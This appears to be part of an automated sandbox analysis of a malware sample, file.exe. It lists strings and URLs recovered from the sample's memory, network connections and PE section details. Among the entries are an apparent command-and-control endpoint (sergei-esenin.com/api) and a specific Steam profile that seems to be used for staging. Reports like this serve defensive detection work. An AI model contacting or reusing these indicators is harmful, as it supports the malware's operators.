    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTz
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=9yzMGndrVfY4&l=e
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: file.exe, 00000000.00000002.1311652132.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000000.00000003.1309102302.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/G9
    Source: file.exe, 00000000.00000003.1309102302.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311652132.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000003.1309102302.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apih
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: file.exe, 00000000.00000003.1309102302.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv
    Source: file.exe, 00000000.00000002.1311410801.00000000013CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: file.exe, 00000000.00000003.1309102302.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tvD
    Source: file.exe, 00000000.00000002.1311410801.00000000013CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaigB
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: file.exe, 00000000.00000002.1311410801.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49701 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001002280_2_00100228
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F10000_2_000F1000
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001020300_2_00102030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001340400_2_00134040
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013A0D00_2_0013A0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F51600_2_000F5160
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000FE1A00_2_000FE1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F71F00_2_000F71F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A0_2_002CB26A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001282D00_2_001282D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001212D00_2_001212D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003352FE0_2_003352FE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F12F70_2_000F12F7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000FA3000_2_000FA300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A23090_2_002A2309
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003913BC0_2_003913BC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F13A30_2_000F13A3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000FB3A00_2_000FB3A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001223E00_2_001223E0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011C4700_2_0011C470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0010049B0_2_0010049B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001044870_2_00104487
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001264F00_2_001264F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C14DD0_2_002C14DD
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F85900_2_000F8590
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F35B00_2_000F35B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0010C5F00_2_0010C5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012F6200_2_0012F620
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F164F0_2_000F164F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001386520_2_00138652
